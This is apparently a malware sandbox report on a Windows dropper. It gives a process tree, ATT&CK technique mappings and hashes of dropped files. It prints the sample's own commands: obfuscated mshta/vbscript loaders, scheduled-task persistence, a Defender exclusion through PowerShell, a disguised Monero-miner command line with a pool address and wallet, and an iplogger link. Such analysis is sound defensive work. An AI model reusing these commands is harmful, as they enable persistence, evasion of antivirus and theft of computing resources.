PID 1400 wrote to memory of 2236	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	7.exe
PID 1400 wrote to memory of 716	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 1400 wrote to memory of 716	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 1400 wrote to memory of 716	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 716 wrote to memory of 2272	716	setup_2.exe	setup_2.tmp
PID 716 wrote to memory of 2272	716	setup_2.exe	setup_2.tmp
PID 716 wrote to memory of 2272	716	setup_2.exe	setup_2.tmp
PID 1400 wrote to memory of 4452	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	jhuuee.exe
PID 1400 wrote to memory of 4452	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	jhuuee.exe
PID 1088 wrote to memory of 4404	1088	sfx_123_206.exe	mshta.exe
PID 1088 wrote to memory of 4404	1088	sfx_123_206.exe	mshta.exe
PID 1088 wrote to memory of 4404	1088	sfx_123_206.exe	mshta.exe
PID 1400 wrote to memory of 3608	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	liuyan-game.exe
PID 1400 wrote to memory of 3608	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	liuyan-game.exe
PID 1400 wrote to memory of 3608	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	liuyan-game.exe
PID 2272 wrote to memory of 4968	2272	setup_2.tmp	setup_2.exe
PID 2272 wrote to memory of 4968	2272	setup_2.tmp	setup_2.exe
PID 2272 wrote to memory of 4968	2272	setup_2.tmp	setup_2.exe
PID 1400 wrote to memory of 4284	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	11.exe
PID 1400 wrote to memory of 4284	1400	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	11.exe
PID 4968 wrote to memory of 1736	4968	setup_2.exe	setup_2.tmp
PID 4968 wrote to memory of 1736	4968	setup_2.exe	setup_2.tmp
PID 4968 wrote to memory of 1736	4968	setup_2.exe	setup_2.tmp
PID 4404 wrote to memory of 4468	4404	mshta.exe	cmd.exe
PID 4404 wrote to memory of 4468	4404	mshta.exe	cmd.exe
PID 4404 wrote to memory of 4468	4404	mshta.exe	cmd.exe
PID 4468 wrote to memory of 4844	4468	cmd.exe	4MCYlgNAW.eXE
PID 4468 wrote to memory of 4844	4468	cmd.exe	4MCYlgNAW.eXE
PID 4468 wrote to memory of 4844	4468	cmd.exe	4MCYlgNAW.eXE
PID 4468 wrote to memory of 2016	4468	cmd.exe	taskkill.exe
PID 4468 wrote to memory of 2016	4468	cmd.exe	taskkill.exe
PID 4468 wrote to memory of 2016	4468	cmd.exe	taskkill.exe
PID 4844 wrote to memory of 1924	4844	4MCYlgNAW.eXE	mshta.exe
PID 4844 wrote to memory of 1924	4844	4MCYlgNAW.eXE	mshta.exe
PID 4844 wrote to memory of 1924	4844	4MCYlgNAW.eXE	mshta.exe
PID 1924 wrote to memory of 3920	1924	mshta.exe	cmd.exe
PID 1924 wrote to memory of 3920	1924	mshta.exe	cmd.exe
PID 1924 wrote to memory of 3920	1924	mshta.exe	cmd.exe
PID 4844 wrote to memory of 2920	4844	4MCYlgNAW.eXE	mshta.exe
PID 4844 wrote to memory of 2920	4844	4MCYlgNAW.eXE	mshta.exe
PID 4844 wrote to memory of 2920	4844	4MCYlgNAW.eXE	mshta.exe
PID 2920 wrote to memory of 2908	2920	mshta.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1400

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
3⤵
PID:1088

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
4⤵
- Scheduled Task/Job: Scheduled Task
PID:584

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
PID:1744

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Scheduled Task/Job: Scheduled Task
PID:3004

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:464

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3468

C:\Users\Admin\AppData\Local\Temp\inst001.exe
"C:\Users\Admin\AppData\Local\Temp\inst001.exe"
2⤵
- Executes dropped EXE
PID:2628

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5104

C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
2⤵
- Executes dropped EXE
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 1636
3⤵
- Program crash
PID:1224

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
2⤵
- Executes dropped EXE
PID:3552

C:\Users\Admin\AppData\Local\Temp\Install.EXE
"C:\Users\Admin\AppData\Local\Temp\Install.EXE"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2704

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:5048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe"
4⤵
- Executes dropped EXE
PID:2260

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSBD2.tmp\Install.cmd" "
4⤵
PID:2396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1NEph7
5⤵
- Enumerates system info in registry
PID:736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x74,0x12c,0x7ffa8db746f8,0x7ffa8db74708,0x7ffa8db74718
6⤵
PID:4760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
6⤵
PID:2288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
6⤵
PID:1676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
6⤵
PID:1396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
6⤵
PID:2676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
6⤵
PID:3904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:1
6⤵
PID:5076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
6⤵
PID:2348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
6⤵
PID:4376

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5788 /prefetch:8
6⤵
PID:2516

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5788 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,781107032675922485,2404053044747711321,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
6⤵
PID:2708

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
4⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4844

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
7⤵
PID:3920

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
7⤵
PID:2908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
8⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
8⤵
PID:4920

C:\Windows\SysWOW64\control.exe
control ..\kZ_AmsXL.6G
8⤵
PID:2584

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
9⤵
- Checks computer location settings
- Loads dropped DLL
PID:2640

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
10⤵
PID:1276

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
11⤵
- Blocklisted process makes network request
- Checks computer location settings
- Loads dropped DLL
PID:3920

C:\Users\Admin\AppData\Local\Temp\e58e683.exe
"C:\Users\Admin\AppData\Local\Temp\e58e683.exe"
12⤵
- Executes dropped EXE
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 784
13⤵
- Program crash
PID:3496

C:\Users\Admin\AppData\Local\Temp\e591beb.exe
"C:\Users\Admin\AppData\Local\Temp\e591beb.exe"
10⤵
- Executes dropped EXE
PID:3784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 780
11⤵
- Program crash
PID:4956

C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "sfx_123_206.exe"
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Users\Admin\AppData\Local\Temp\7.exe
"C:\Users\Admin\AppData\Local\Temp\7.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:716

C:\Users\Admin\AppData\Local\Temp\is-R6ANR.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-R6ANR.tmp\setup_2.tmp" /SL5="$602B6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2272

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4968

C:\Users\Admin\AppData\Local\Temp\is-6JOQS.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6JOQS.tmp\setup_2.tmp" /SL5="$A023E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1736

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
2⤵
- Executes dropped EXE
PID:4452

C:\Users\Admin\AppData\Local\Temp\liuyan-game.exe
"C:\Users\Admin\AppData\Local\Temp\liuyan-game.exe"
2⤵
- Executes dropped EXE
PID:3608

C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1992 -ip 1992
1⤵
PID:716

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4712

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3404 -ip 3404
1⤵
PID:1036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3784 -ip 3784
1⤵
PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\install.exe.log

Filesize
1KB

MD5
d143fbf26ef7c5350636d5f77ed0095d

SHA1
f549dfa0c61501a855604956c407efc81cc318f0

SHA256
07dffc7d22db12a99331028626a7c3ec98bfc490662733e5c3a9b15934776469

SHA512
a1d4b17339a3c54e23eb3d70ad67e4bd6ca12c91a22cfa3b70a5fa0ced22d45bcf4d52fc22ecc35d762c514f5e98330b23601aed16124426a8f2bfdab5e50719

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
180B

MD5
4bc8a3540a546cfe044e0ed1a0a22a95

SHA1
5387f78f1816dee5393bfca1fffe49cede5f59c1

SHA256
f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca

SHA512
e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.exe

Filesize
8KB

MD5
5e2dbda60ebcc890fcbe04df9df53674

SHA1
703f35f880fd33bbdb9e5be85e350936bf70d73b

SHA256
bd36c700c8d850b1b2e762c16304323658845f2327162c9e6544b328d9a38996

SHA512
b05564f36f5c62e28cfe8ab2f5b97c2117e42654751a2150ec56685da193e1b7d9f856fa6f00772fd2d1dfff1d18c5c40850a045a8e10ea5b64d2b3e841559bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7.exe

Filesize
8KB

MD5
f8e91b342ebce70392ab6e30f479b03a

SHA1
c1c2ef60eb84809363fa68800248fcdbd4e716c5

SHA256
2b93dcc527748dedc2e98226bb5715aced2af9ee1c525aad241d0f9957a7a5a9

SHA512
afd03bf12b8b0bf82481bfda3d0378ff2e3067600933e189880bf3b4b7ce37ba819350c96a013fa8a6e69a6886f556a3fac6f97d360b348b21ac07b3b66d802b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSBD2.tmp\Install.cmd

Filesize
51B

MD5
d9b6b6bdeef1a3d9480dd644585e6e8b

SHA1
068c0e58cd7a58d3da0a39368e1be1907c6c08bb

SHA256
8c45bb0d8691c9c3981b1c8cba6ed8587a16b9aa59f7cf191cabfcb30d31b49d

SHA512
b30edbb544552e66dc9c20a51ea4cfc66ed86c7ae8aed44f953a917ca7430249e58d37fbb750cbd985b73ad5c9f2c31bec2c8b36a95b0eae525c6a3494a8a1b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

Filesize
43KB

MD5
93460c75de91c3601b4a47d2b99d8f94

SHA1
f2e959a3291ef579ae254953e62d098fe4557572

SHA256
0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2

SHA512
4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

Download Submit
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe

Filesize
63KB

MD5
99487f0480515ae7d3ddf53661dbe73b

SHA1
1b827891b06b712b4fbdb06a376ba9738aa83769

SHA256
9cf12d4d774c6fc2075cd01999034186b7f8dd0ae0830569156c9e4d27357096

SHA512
01139b59bc5ac81e1ad83c22a88ad4d78ae31f2c9ea28a96d596af1b00e903137a35fdc88e94cc1110c8d2e163e89dad4e3dae71260a43e672cf7ea7bf7b9ded

Download Submit
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe

Filesize
757KB

MD5
c69af5d1287e7b8bd8624cc59cf40073

SHA1
45d0653cb46ef19ee75e68bbb2ee2675b98bcfe2

SHA256
f42988bbf4387ec249991ee083a1e8fe7ca10e0b6a6f8376e0fdbeca23962de1

SHA512
05d1185fb0941fe26b5b056ac9716712e10eb56d1935189ed0ef69e1f747d10512df7b7edb65c2f9af88d067fc67b9f8c84a13b09da5932ba0c08a248e0f960c

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE

Filesize
117KB

MD5
7383806624310451cbdaec0b1b395c1c

SHA1
0b816e9d921983ba5755680886ca7ac661ebd593

SHA256
f077f1d88003955e423200cb2a2598444bfb5cb30958ec0787ff406de5a3645c

SHA512
f50ff46316f301146a2787844ca16fa5e15dd77f7db409b7001ae68fe3f3905605f3b76c98c853077d0b27d0980408219fbd6a52ad63d2507e219e5b6a8c135f

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe

Filesize
555KB

MD5
fca5c7ce896e4f860d2abe7eb7039f51

SHA1
040c5f470dccedf9c8a38d315b805c35801b12cd

SHA256
fcd9d2a204aa7443912f6c656122d97ef2a6186a2b47bcf99d6da59cb1a99f00

SHA512
cd17b1ce43d20dd9f5ebfb01eebdf1001c1ac9e77e5c1406bbfe91ab4a48690814e9abb48f6f8a26430ad2b7bb3d1a334f6ade2b5d0286cba8103a25f3318675

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.EXE

Filesize
596KB

MD5
9ea08213957dc34b997442720dfc4b69

SHA1
6ea4035a3db8d3016b5e5acf166c6c4fe0080cab

SHA256
8b5f1e434980d95f20f67b5a6817385b7f3726185acc4733c0365daa03edb5e6

SHA512
f6e45183ec8b7a633f18751128238890a90b8da866209d62a63bc4135e38b92915b2c87ae56fe7f44a5d0cc64321238551c8adc0ac7e20a84df441804bc21d74

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\4~T6.Kj6

Filesize
2B

MD5
ac6ad5d9b99757c3a878f2d275ace198

SHA1
439baa1b33514fb81632aaf44d16a9378c5664fc

SHA256
